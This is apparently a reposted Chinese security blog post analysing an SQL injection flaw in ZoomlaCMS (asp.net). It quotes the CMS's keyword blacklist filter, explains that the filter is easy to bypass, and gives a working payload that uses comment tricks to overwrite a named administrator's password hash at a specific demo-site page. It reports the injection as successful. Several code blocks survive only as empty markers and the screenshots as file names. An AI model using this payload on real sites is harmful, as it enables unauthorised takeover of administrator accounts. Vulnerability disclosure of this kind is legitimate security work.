逐浪CMS通用型SQL注入漏洞分析与利用(asp.net)

作者wefgod

绕过了那个很简单的防注入。直接可以update管理员密码。

注入点:

http://demo.zoomla.cn/user/cashcoupon/arrivejihuo.aspx

页面的按钮点击事件:

[/crayon]

Page_Load方法里面有调用到了一个函数:
DataSecurity.StartProcessRequest();
上面这个函数具体是这样的:

[/crayon]

里面还调用到一个DataSecurity.ProcessSqlStr

[/crayon]

对于变量
string SqlStr = “and |exec |insert |select |delete |update |count |chr |mid |master |truncate |char |declare “;
里面的特征字符串,仅仅是做了一个很简单的匹配,很容易绕过,看例子:
在页面正常输入东西:
image019.png
提交的时候截断一下,改下优惠券编号的代码,如下:
1′;update/**/zl_manager set adminpassword=’c4ca4238a0b923820dcc509a6f75849b’ where adminname=’testuser’–
执行前管理密码是这样的:
20131125104511767[1]
执行后是这样的:
20131125104512511[1]
表明注入成功。
原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录